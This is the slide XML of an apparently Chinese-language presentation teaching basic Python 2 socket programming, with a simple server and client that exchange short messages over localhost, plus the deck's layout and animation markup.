                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、开始通讯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text = c.recv(1024)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c.send('Hello')</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关闭连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c.close()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="220980" y="970915"/>
            <a:ext cx="6066790" cy="5323840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId2"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition p14:dur="9"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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-54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6" grpId="0"/>
      <p:bldP spid="36" grpId="1"/>
      <p:bldP spid="36" grpId="2"/>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765810" y="1155065"/>
            <a:ext cx="4568190" cy="4367530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#coding:utf-8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from socket import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s = socket(AF_INET, SOCK_STREAM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.bind(('',6666))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.listen(1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	sock, addr = s.accept()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	print 'Connected by ',addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	data = sock.recv(1024)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	print data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	sock.send('Yes')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361430" y="1155065"/>
            <a:ext cx="8329930" cy="4696460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#coding:utf-8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from socket import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HOST = '127.0.0.1'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PORT = sys.argv[1] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c = socket(AF_INET,SOCK_STREAM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c.connect(('127.0.0.1',int(PORT)))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print 'Connect success.' </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c.send('Yes or not?')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data = c.recv(1024)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c.close()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId1"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6639549" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId1"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898015" y="2283460"/>
            <a:ext cx="8191500" cy="24403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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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P spid="36" grpId="0"/>
      <p:bldP spid="36" grpId="1"/>
      <p:bldP spid="36" grpId="2"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="3" grpId="2"/>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89535" y="901065"/>
            <a:ext cx="6539865" cy="6137275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6957695" y="901065"/>
            <a:ext cx="5090795" cy="4527550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="920115" y="1343025"/>
